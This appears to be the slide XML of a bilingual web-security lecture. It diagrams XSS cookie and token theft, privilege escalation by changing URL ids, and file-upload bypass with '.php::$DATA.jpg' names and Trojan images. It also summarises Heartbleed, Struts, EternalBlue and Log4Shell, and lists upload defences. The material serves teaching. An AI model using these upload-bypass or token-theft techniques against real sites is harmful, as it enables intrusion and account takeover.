            <a:ext cx="36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information / Cookie /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23CD2C-F4A2-F26C-0C43-ADA5D3C1D59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5757334" y="4195085"/>
            <a:ext cx="634983" cy="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82735-B282-B9CD-1F2B-1905C1C39D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392317" y="3882936"/>
            <a:ext cx="776128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282043-CF93-8A00-C6B3-2D4A9973703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168445" y="4177322"/>
            <a:ext cx="2621280" cy="1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5DA6A10-1AF1-3515-E97C-DBB12EA3D73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9789725" y="3863651"/>
            <a:ext cx="2833511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XSS-Web database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;payload&lt;/script&gt;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31FA8-D5C8-424F-F76D-91CD907FB636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7168445" y="3764179"/>
            <a:ext cx="283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&lt;script&gt;payload&lt;/script&gt;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4C1A4F8-6373-FA62-A63E-FAAA619D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187" y="3817666"/>
            <a:ext cx="906738" cy="7193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D0F290-CE2C-1649-3F15-0371A6C62BF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12832695" y="4347474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FC0B2-E91B-F1CB-6593-AC56019EB86D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="43" idx="1"/>
            <a:endCxn id="34" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="12623236" y="4177322"/>
            <a:ext cx="526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DFDA84-3318-4C0B-4AB9-BE3F196DF36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9444880" y="575892"/>
            <a:ext cx="17763" cy="8299591"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1386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2F2AA23-5CC4-011A-D6BA-8CDEF459136D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7041427" y="4579001"/>
            <a:ext cx="36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information / Cookie / token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7F0FAA5-5D65-8417-47CD-A46E9638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38" y="5434516"/>
            <a:ext cx="906738" cy="7193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7DE2214-C1F7-6434-CC0E-6DAF40E55E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500846" y="5964324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BF6512-7F86-1EFB-D92A-84587A15EF4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725076" y="5794172"/>
            <a:ext cx="634983" cy="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17E5215-90F2-0CD6-8DB0-5CB51B47A63B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360059" y="5482023"/>
            <a:ext cx="776128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44AB9F-7F9D-FBB9-3D9F-496EDA97D511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7136187" y="5776409"/>
            <a:ext cx="2621280" cy="1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348B09-710B-6A48-A391-01D98721A94C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9757467" y="5462738"/>
            <a:ext cx="2833511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XSS-Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dom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&lt;script&gt;payload&lt;/script&gt;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8E1E9-F8E7-1906-D00D-95AE2AC4B075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136187" y="5363266"/>
            <a:ext cx="283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&lt;script&gt;payload&lt;/script&gt;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A2AD46B-8665-E745-A599-6205EF28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929" y="5416753"/>
            <a:ext cx="906738" cy="71931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13F7466-CC4D-7EDC-D40B-0E3DD517D1C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12800437" y="5946561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A75571-D42A-4476-A808-50DEEEDB95D3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>
            <a:off x="12590978" y="5776409"/>
            <a:ext cx="526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174428C-98FC-62BB-E803-61E8B391570A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="63" idx="2"/>
            <a:endCxn id="56" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9412622" y="2174979"/>
            <a:ext cx="17763" cy="8299591"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1386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30433B-7A5E-6E37-43B0-C8DAACF9DFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7009169" y="6178088"/>
            <a:ext cx="36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information / Cookie / token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="67" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839AA345-622E-BCC6-0396-2DE5B5884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50288"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="383812" y="2492738"/>
          <a:ext cx="3851233" cy="38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40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E048-1D0C-E65C-5EFA-77B6633B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access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3F4B-678B-FB66-D486-A82980E3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2701-E5D4-EE0E-A3EC-401B8A5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F624-5775-DA2B-9FF0-4F97E155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B696D-55AD-FF84-29EA-FEDA0CE3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56" y="1905230"/>
            <a:ext cx="906738" cy="719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680FB-5469-F4FB-2B9B-0CBB42004EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950356" y="2624542"/>
            <a:ext cx="90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56F0A-7E5F-5C91-C03E-9F51AA2B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56" y="3064124"/>
            <a:ext cx="906738" cy="719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18859-A856-9ADC-6B67-A9415E1EE68B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015666" y="3783436"/>
            <a:ext cx="77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D9E309-B95F-9739-2616-6C7A07BD14DA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857094" y="2264886"/>
            <a:ext cx="294225" cy="9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DE62C1-40D3-7B2D-A796-E89088C26F80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828605" y="1867515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Admin-token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8812B1-106F-8802-A99E-296ABD756F5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151319" y="1914906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page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F6F2E8-8C0E-35D1-2BA4-BF3E29113426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1857094" y="3423780"/>
            <a:ext cx="294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B6005-29F8-3E81-B905-A60BB0DAEE14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663634" y="2987391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User-token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C853D-E9FC-B9AD-E44C-2C408C99B833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151319" y="3064124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3F7AFB-E451-3002-883D-BC28D8E1B29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="3"/>
            <a:endCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3693040" y="2264886"/>
            <a:ext cx="1890182" cy="9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8A089E2-75EF-A40A-1C4B-E0E5EA7AB0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583222" y="1833670"/>
            <a:ext cx="2179674" cy="86243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management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C1EBD34-8251-11ED-4F57-C00116B15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585436"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1319616" y="4671175"/>
          <a:ext cx="6808383" cy="253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F2C4C3B3-15B6-2F7A-8ACB-610C74A0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46" y="2460068"/>
            <a:ext cx="906738" cy="7193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BD0671-0C8B-AB9F-A39B-293D74C3EF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585454" y="3077371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06C140-0763-BF94-035D-72D932B24C75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>
            <a:off x="9809684" y="2819724"/>
            <a:ext cx="2722721" cy="12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A14CBD-F1E7-2969-6862-1F2DAA761F1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9847933" y="2505420"/>
            <a:ext cx="27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Url: https://.../?id=User1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User1-token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03106-6652-6D73-C51D-0FDD4D7E0440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12532405" y="2472858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User1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A98358-C547-62A4-E206-87634BC2B9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12532405" y="3723702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User2 page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8612EB3-7425-C024-134E-EFC8D67E1EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="59" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10626033" y="2176985"/>
            <a:ext cx="636655" cy="31760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DCDB-A025-75C6-61B1-E603A2890CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12528347" y="4607925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User3 page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035D1B6-9644-841E-C99F-EDA1DADFFD8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="66" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10181892" y="2621126"/>
            <a:ext cx="1520878" cy="31720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65B36D1-18AF-0874-441E-B93DFCF00798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12528347" y="5525505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User4 page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0838A59-4257-2726-DACC-8D417326CCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="69" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9723102" y="3079916"/>
            <a:ext cx="2438458" cy="31720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3BC09C1-3C82-B982-0323-E039AFCD5DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9570688" y="3765775"/>
            <a:ext cx="27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Url: https://.../?id=User2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User1-token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52822B-C44E-D754-E758-06587E260AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9570688" y="4653294"/>
            <a:ext cx="27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Url: https://.../?id=User3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User1-token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25504F-1703-EAF6-DBDA-92AE132EB119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9565719" y="5531598"/>
            <a:ext cx="27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Url: https://.../?id=User4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User1-token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DADD07-D9C7-B8EB-1438-0CB88524F8D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530901" y="148470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Söhne"/>
              </a:rPr>
              <a:t>Vertical Privilege Escalation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>垂直越权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>)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0BB2FF-2EDC-D701-2D70-96A7CCBD3AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="1562220"/>
            <a:ext cx="4387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Horizontal Privilege Escalation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>水平越权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>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D4307-4F08-8CF9-84A8-58B26B35B496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4893298" y="3106955"/>
            <a:ext cx="3565855" cy="636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https://xxx/userManagement.html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89098B-524C-6169-71E8-171A34A1F755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>
            <a:off x="3693040" y="3423780"/>
            <a:ext cx="1200258" cy="1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A54FB7-FC8E-9018-B215-01521F90706B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="0"/>
            <a:endCxn id="27" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6673059" y="2696101"/>
            <a:ext cx="3167" cy="41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278E8C-FCAE-37B9-CCA9-7807D1A741D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6051692" y="2749772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User-token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4837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0DA9-1449-2AF0-A8C5-D970A3C2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Code Execution(RCE)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263A-4864-5A07-F842-A7E050ED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AAB4-2FFC-C9EE-0EA8-5B0E47D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B36B-91BC-C372-1BBD-FBDFE196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CA796-9D2F-3D4F-3901-A7E37E3BB8B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6032441" y="1422703"/>
            <a:ext cx="846249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Heartbleed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漏洞 </a:t>
            </a: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(2014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描述：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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OpenSSL</a:t>
            </a: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中的一个安全漏洞，允许攻击者读取内存中的敏感信息，包括私钥等。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后果：攻击者可以访问和窃取本应保密的数据，危害了通信的机密性。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CVE-2017-5638 (Apache Struts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漏洞</a:t>
            </a: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描述：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Apache Struts</a:t>
            </a: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中的一个漏洞，通过精心构造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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请求，攻击者可以执行任意命令。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后果：攻击者可以在受影响的服务器上执行代码，潜在地导致远程系统控制。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EternalBlue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漏洞 </a:t>
            </a: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(2017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描述：影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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操作系统的漏洞，被用于传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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WannaCry</a:t>
            </a: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勒索软件。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后果：允许攻击者远程执行恶意代码，感染系统并加密用户文件，要求支付赎金。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="14699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Apache Log4j2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1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漏洞，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CVE-2021-44228</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F0F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F0F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描述：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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这个漏洞在当时引起了广泛关注，因为它影响了许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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应用程序，尤其是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0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后果：该漏洞是由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0F0F0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中的一个安全漏洞导致的，攻击者通过精心构造的日志事件可以执行任意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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D47DA05E-957F-407C-79E5-E58329501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49736"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-545095" y="1605804"/>
          <a:ext cx="7136518" cy="592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84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DEB7-59F3-ADF8-18AA-033EF940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Vuln. &amp; Parsing Vuln.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56CB-EC4C-BF44-250D-2DE0F00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E488-25E2-6DCA-5453-069B82C0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5BA2-7F63-7283-B7CE-407DDB49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9EB37E-B456-8022-FE24-97FB2579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2" y="2093279"/>
            <a:ext cx="906738" cy="7193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B2DFA4-88D7-5673-156A-37FFEBFC03E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586160" y="2452935"/>
            <a:ext cx="294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4DC4A-8DFD-6CCA-02AA-4567061EEB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880385" y="2093279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 err="1"/>
              <a:t>.php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1395A-4E69-ECFE-57BA-AE5A8E355F93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361930" y="2623087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B338B0-DD95-FB5B-7E40-4C5899A994B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22106" y="2452935"/>
            <a:ext cx="294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AE8F0-72D8-D426-3C3D-1B10876B5273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3716331" y="2093279"/>
            <a:ext cx="2707046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 err="1"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>::$DATA.jpg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8658506-3629-6161-1DB1-49996DAEFDA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6423377" y="2452935"/>
            <a:ext cx="812800" cy="562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E69E0F9-82F7-1B5B-E5DE-A34C8341329B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3242687" y="882523"/>
            <a:ext cx="382959" cy="46027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19148-646B-8A46-DC92-9400BD0AB294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5735541" y="3015722"/>
            <a:ext cx="300127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http://.../upload/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 err="1"/>
              <a:t>.php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16407-1A84-42EF-37D1-34BA96488045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3217333" y="3004567"/>
            <a:ext cx="15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A145B1-0C5F-33B9-5E7A-20D7047F6C46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807198" y="1851467"/>
            <a:ext cx="0" cy="105072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24777C-7B1F-6255-5983-57F540B2BAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299199" y="1470483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Detection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D2E55-0071-CC5F-8CE7-3809DEBDC925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8736812" y="3375378"/>
            <a:ext cx="528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D02EB-9141-2941-A11C-1FC7518DB69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9264917" y="3015722"/>
            <a:ext cx="1337662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Shell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70ECBD-099A-B361-DD86-2C8BBEA4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2" y="4922892"/>
            <a:ext cx="906738" cy="71931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FB93DB-3112-4CAC-1673-ADF1FBABF311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1586160" y="5282548"/>
            <a:ext cx="294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734270-5E08-3083-0478-99CFC46A0FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880385" y="4922892"/>
            <a:ext cx="154172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 err="1"/>
              <a:t>.php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13450-CD01-6327-72C0-9B6D69C955B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541683" y="5441048"/>
            <a:ext cx="118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1C6231-B514-43C8-02D3-D504C94312B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22106" y="5282548"/>
            <a:ext cx="294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045EF-91CC-894E-8C5C-A46AAD19B305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3716331" y="4922892"/>
            <a:ext cx="2707046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/>
              <a:t>.jpg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88E3E1B-E455-CFDA-6EF9-1ADC353C3B66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>
            <a:off x="6423377" y="5282548"/>
            <a:ext cx="812800" cy="519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E78DFB-04D4-F704-AB12-2A59DB6AD8FF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3260311" y="3686048"/>
            <a:ext cx="350899" cy="459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C1FBA3F-0478-28A2-2FB2-F260A8AEAC1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5735541" y="5801623"/>
            <a:ext cx="3001271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http://.../upload/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Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.jpg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C226B-AE22-1B69-6ECC-379419CDBB13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3217333" y="5834180"/>
            <a:ext cx="15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64391-3D89-B5E6-948C-1A97DACEEC57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773331" y="4783451"/>
            <a:ext cx="0" cy="105072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7F88D4-0CAD-6BB5-DF20-B47529A28B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197598" y="440256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Detection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0A8655-F764-3B83-7FB2-C7E7AAFB1B4E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8736812" y="6149130"/>
            <a:ext cx="528105" cy="12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7F12B92-E02C-3118-F459-AC89DB9609C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9264917" y="5789474"/>
            <a:ext cx="1337662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Shell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A1C98-901A-A125-3E52-D710E82AAD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5632369" y="6532230"/>
            <a:ext cx="31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Insecure configuration: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All files in the upload folder are executed as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php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CEFBB4-3C5C-7C6E-3DAF-6ACAAE8CBEEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10723496" y="4856468"/>
            <a:ext cx="3815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Suffix name whitelist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/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Reset random file name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/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Does not return upload path </a:t>
            </a:r>
          </a:p>
          <a:p>
